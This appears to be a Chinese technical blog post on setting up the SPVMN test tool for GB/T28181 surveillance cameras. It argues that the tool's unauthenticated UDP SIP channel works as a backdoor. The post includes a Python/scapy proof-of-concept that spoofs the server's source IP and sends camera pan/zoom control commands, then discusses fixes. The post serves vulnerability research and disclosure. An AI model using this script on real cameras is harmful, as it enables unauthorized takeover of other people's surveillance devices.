Spvmn测试环境搭建及其安全性讨论

一、说明

这几天都在做设备的协议分析,然后看到有个叫Spvmn的不懂要怎么操作才能触发其操作过程,问了测试部的同事说也没有测试文档,自己研究了一下这里做个记录。

按我现在理解,各厂商有自己的私有协议、ONVIF是世界标准协议、GB/T28181是国标;Onvif Test Tool是ONVIF协议实现的测试工具,而SPVMN是GB/T28181协议实现的测试工具。

二、环境搭建

IPC:首先需要一台支持GB/T28181(或者说有Spvmn配置)的IPC,这个是必然的。

Windows电脑:看spvmn里边的文档说只支持Windows,Linux没试过。

JDK1.5:我使用JDK1.8该问页面一直报错,换成1.5才能成功访问。下载地址点链接

报错:org.apache.jasper.JasperException: Unable to compile class for JSP

Spvmn测试环境搭建及其安全性讨论

Spvmn工具下载地址:http://7dx.pc6.com/wwb5/SPVMN.zip

下载直接解压到自己想要的目录,该工具本质是一个tomcat,里边部署了一个用于测试的jsp应用。和正常tomcat一样到bin目录点击startup.bat启动即可。

不过要注意,该tomcat默认使用8080端口,然后又启了在5060开了一个监听,所以在启动前要注意确保本机的这两个端口没被占用。

tomcat启动完成后,访问后边的链接,如果一切正常页面应如下图:http://127.0.0.1:8080/SIPStandardDebug/

Spvmn测试环境搭建及其安全性讨论

三、测试操作

3.1 配置IPC上线

使用Onvif Test Tool等工具,我们都是在Onvif Test Tool等工具输入IPC的用户名密码向IPC认证。但Spvmn反过来,是在IPC中输入Spvmn的“用户名密码”,IPC向Spvmn认证。

这认证逻辑存在问题,我们后边再说,这里主要是知道是这样子就可以了。

Spvmn的“用户名密码”,存放在"webapps\SIPStandardDebug\WEB-INF\classes\SSDConfig.properties"中,主要找到这两个节区的信息

Spvmn测试环境搭建及其安全性讨论

找到这些信息后,打开IPC上的Spvmn配置页面,把这些信息复制填到Spvmn页面对应的框中,然后保存启动即可。(Sip服务器就是装Spvmn的那台电脑)

Spvmn测试环境搭建及其安全性讨论

此时回到Spvmn页面,依次点调测辅助面---链路管理,如无意外在弹出页面中即可看到IPC成功上线。

Spvmn测试环境搭建及其安全性讨论

Spvmn测试环境搭建及其安全性讨论

3.2 测试操作

第一步,点击“调测设备类型”选好要进行调测的设备,我们这里是IPC

第二步,在下面的各种操作通过点击选中自己要测试的命令,比如我这里点“向左”

第三步,点选好命令后在左下窗格中即会呈现该命令将会发送的主体报文,点击“发送消息”按钮,该命令即会向IPC发出返回结果呈现在右下窗格中。

当然协议实现除了看有消息返回外,更主要的还是要看IPC是否真的执行了相应的动作。比如我们这里发了“向左”命令,IPC是否真的有向左旋转。

Spvmn测试环境搭建及其安全性讨论

四、Spvmn有可能沦为后门

4.1 原因分析

使用wireshark拦截数据包观察交互过程如下图。

IPC向Spvmn发起注册(REGISTER)请求,Spvmn回复未认证(Unauthorized),IPC通过Digest形式提交用户名密码,Spvmn回复认证成功。而后就都是Spvmn向IPC发送各种命令操控IPC(MESSAGE)。

Spvmn测试环境搭建及其安全性讨论

正如我们向服务器认证,后续请求都得带session向服务器表明身份而服务器什么都不需要带一样;ipc向spvmn认证,那么后续请求上都是ipc向spvmn携带认证信息,而spvmn不会向ipc携带认证信息。(实际看来只有在上线注册时ipc向spvmn带了用户名密码,之后双方就都没带会话信息)

既然不需要认证信息的话,那是不是说,只要IPC开启spvmn,我伪装成spvmn服务器向ipc发命令ipc都会执行。而经过实验发现事实也是如此,测试代码如下可自行使用自己环境进行测试。

from scapy.all import *

# 伪装成本地spvmn发包,这个其实没必要
local_ip = "10.10.6.91"
local_port = 5060
# 有些IPC限制只接收从spvmn页面配置的ip发来的命令,此时可以通过伪造IP绕过
cheat_ip = "10.10.6.92"
# 目标ipc ip和端口
# ipc_ip = "10.10.6.98"
ipc_ip = "10.20.23.150"
ipc_port = 5060
# 1--turn_left,2--zoom_out,3--zoom_out_use_scapy,4--stop
command_flag = 3 # 让IPC向左旋转命令
def turn_left():
# 建立发送socket,和正常UDP数据包没区别
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# 其实不需要绑定端口
# send_sock.bind((local_ip, local_port)) message = ("""MESSAGE sip:34020000001320000001@34020000 SIP/2.0\r\n"""
"""Call-ID: b73541b1e114a46ed90805e4da810973@0.0.0.0\r\n"""
"""CSeq: 1 MESSAGE\r\n"""
"""From: <sip:34020000002000000001@34020000>;tag=86660128_53173353_32620149-dd3d-44e4-87ba-04ed172c9c00\r\n"""
"""To: <sip:34020000001320000001@34020000>\r\n"""
"""Max-Forwards: 70\r\n"""
"""Content-Type: Application/MANSCDP+xml\r\n"""
"""Route: <sip:34020000001320000001@10.10.6.98:5061;line=69701e6f20a4d96;lr>\r\n"""
"""Monitor-User-Identity: operation=ptz,extparam=0\r\n"""
"""Via: SIP/2.0/UDP 10.10.6.91:5060;branch=z9hG4bK32620149-dd3d-44e4-87ba-04ed172c9c00_53173353_18249986822757\r\n"""
"""Content-Length: 169\r\n"""
"""\r\n"""
"""<?xml version="1.0"?>\r\n"""
"""<Control>\r\n"""
"""<CmdType>DeviceControl</CmdType>\r\n"""
"""<SN>11</SN>\r\n"""
"""<DeviceID>34020000001320000001</DeviceID>\r\n"""
"""<PTZCmd>A50F01021F0000D6</PTZCmd>\r\n"""
"""</Control>\r\n""") send_sock.sendto(message.encode(), (ipc_ip, ipc_port))
print(f'{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}: message send finish') send_sock.close() # 放大
def zoom_out():
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
message = ("""MESSAGE sip:34020000001320000001@34020000 SIP/2.0\r\n"""
"""Call-ID: 777439ee00588111099b4d6bec2d68f4@0.0.0.0\r\n"""
"""CSeq: 1 MESSAGE\r\n"""
"""From: <sip:34020000002000000001@34020000>;tag=41520101_53173353_d839a55f-03bb-4cc7-9b7a-d3a7c1fc659e\r\n"""
"""To: <sip:34020000001320000001@34020000>\r\n"""
"""Max-Forwards: 70\r\n"""
"""Content-Type: Application/MANSCDP+xml\r\n"""
"""Route: <sip:34020000001320000001@10.10.6.98:5060;line=4bc806b81a29f15;lr>\r\n"""
"""Monitor-User-Identity: operation=ptz,extparam=0\r\n"""
"""Via: SIP/2.0/UDP 10.10.6.91:5060;branch=z9hG4bKd839a55f-03bb-4cc7-9b7a-d3a7c1fc659e_53173353_109133442800318\r\n"""
"""Content-Length: 169\r\n"""
"""\r\n"""
"""<?xml version="1.0"?>\r\n"""
"""<Control>\r\n"""
"""<CmdType>DeviceControl</CmdType>\r\n"""
"""<SN>11</SN>\r\n"""
"""<DeviceID>34020000001320000001</DeviceID>\r\n"""
"""<PTZCmd>A50F0110000010D5</PTZCmd>\r\n"""
"""</Control>"""
) send_sock.sendto(message.encode(), (ipc_ip, ipc_port))
print(f'{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}: message send finish') send_sock.close() # 使用scapy伪造源IP地址
def zoom_out_use_scapy():
message = ("""MESSAGE sip:34020000001320000001@34020000 SIP/2.0\r\n"""
"""Call-ID: 777439ee00588111099b4d6bec2d68f4@0.0.0.0\r\n"""
"""CSeq: 1 MESSAGE\r\n"""
"""From: <sip:34020000002000000001@34020000>;tag=41520101_53173353_d839a55f-03bb-4cc7-9b7a-d3a7c1fc659e\r\n"""
"""To: <sip:34020000001320000001@34020000>\r\n"""
"""Max-Forwards: 70\r\n"""
"""Content-Type: Application/MANSCDP+xml\r\n"""
"""Route: <sip:34020000001320000001@10.10.6.98:5060;line=4bc806b81a29f15;lr>\r\n"""
"""Monitor-User-Identity: operation=ptz,extparam=0\r\n"""
"""Via: SIP/2.0/UDP 10.10.6.91:5060;branch=z9hG4bKd839a55f-03bb-4cc7-9b7a-d3a7c1fc659e_53173353_109133442800318\r\n"""
"""Content-Length: 169\r\n"""
"""\r\n"""
"""<?xml version="1.0"?>\r\n"""
"""<Control>\r\n"""
"""<CmdType>DeviceControl</CmdType>\r\n"""
"""<SN>11</SN>\r\n"""
"""<DeviceID>34020000001320000001</DeviceID>\r\n"""
"""<PTZCmd>A50F0110000010D5</PTZCmd>\r\n"""
"""</Control>"""
)
udp_packet = IP(src=cheat_ip, dst=ipc_ip) / UDP(dport=ipc_port) / message
send(udp_packet) # 让IPC停止所有动作命令
def stop():
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# 其实不需要绑定端口
# send_sock.bind((local_ip, local_port)) message = ("""MESSAGE sip:34020000001320000001@34020000 SIP/2.0\r\n"""
"""Call-ID: 0b9ed3de1558c60bc7ec2efc0dbdb744@0.0.0.0\r\n"""
"""CSeq: 1 MESSAGE\r\n"""
"""From: <sip:34020000002000000001@34020000>;tag=87210045_53173353_32620149-dd3d-44e4-87ba-04ed172c9c00\r\n"""
"""To: <sip:34020000001320000001@34020000>\r\n"""
"""Max-Forwards: 70\r\n"""
"""Content-Type: Application/MANSCDP+xml\r\n"""
"""Route: <sip:34020000001320000001@10.10.6.98:5061;line=69701e6f20a4d96;lr>\r\n"""
"""Monitor-User-Identity: operation=ptz,extparam=0\r\n"""
"""Via: SIP/2.0/UDP 10.10.6.91:5060;branch=z9hG4bK32620149-dd3d-44e4-87ba-04ed172c9c00_53173353_20090787679737\r\n"""
"""Content-Length: 169\r\n"""
"""\r\n"""
"""<?xml version="1.0"?>\r\n"""
"""<Control>\r\n"""
"""<CmdType>DeviceControl</CmdType>\r\n"""
"""<SN>11</SN>\r\n"""
"""<DeviceID>34020000001320000001</DeviceID>\r\n"""
"""<PTZCmd>A50F0100000000B5</PTZCmd>\r\n"""
"""</Control>\r\n""") send_sock.sendto(message.encode(), (ipc_ip, ipc_port))
print(f'{time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())}: message send finish') send_sock.close() if __name__ == "__main__":
if command_flag == 1:
turn_left()
elif command_flag == 2:
zoom_out()
elif command_flag == 3:
zoom_out_use_scapy()
else:
stop()

4.2 修复讨论

方法一:

我们能不能在IPC端设定,只处理来自自身配置好的Spvmn的ip发来的命令?

答案是不能完全解决。实际发现有些厂商就做了ip限制,但因为使用的是UDP协议,IP完全是可以伪造的。

方法二:

在4.1的代码的请求中我们可以看到有一些应该是spvmn服务器的一些信息,我们可不可以在IPC端通过提取这些信息与spvmn配置页面中的进行比对一致才进行处理?

这应该是可以解决spvmn伪造的问题,但还存在的问题就是倘若spvmn服务器信息泄漏,那么IPC也会被控制;或者说此时spvmn的用户名密码也扮演了IPC用户名密码的角色,这增大了IPC的攻击面。另外在spvmn功能就类似操作系统的telnetd和sshd,攻击者侵入web后配置好spvmn就得到了一个天然的后门程序。

方法三:

4.1中我们说spvmn把认证方向搞反了,其实如果spvmn使用的是tcp而不是udp不用调整认证方向也能达到和方案二一样的效果。因为如果使用tcp那就是ipc随便选一个端口与spvmn服务器进行连接,该端口是ESTABLISHED状态而不是LISTENING状态,你新建一个进程试图与该端口建立连接该端口是不予理会的;而倘若是udp没有建立连接过程只能是监听状态,伪造的数据它也无法区分。但如果使用这种方法进行修复就不符合协议标准了,只是提一下。

参考:

https://blog.csdn.net/hiwubihe/article/details/82910685

上一篇:NCO


下一篇:explicit关键字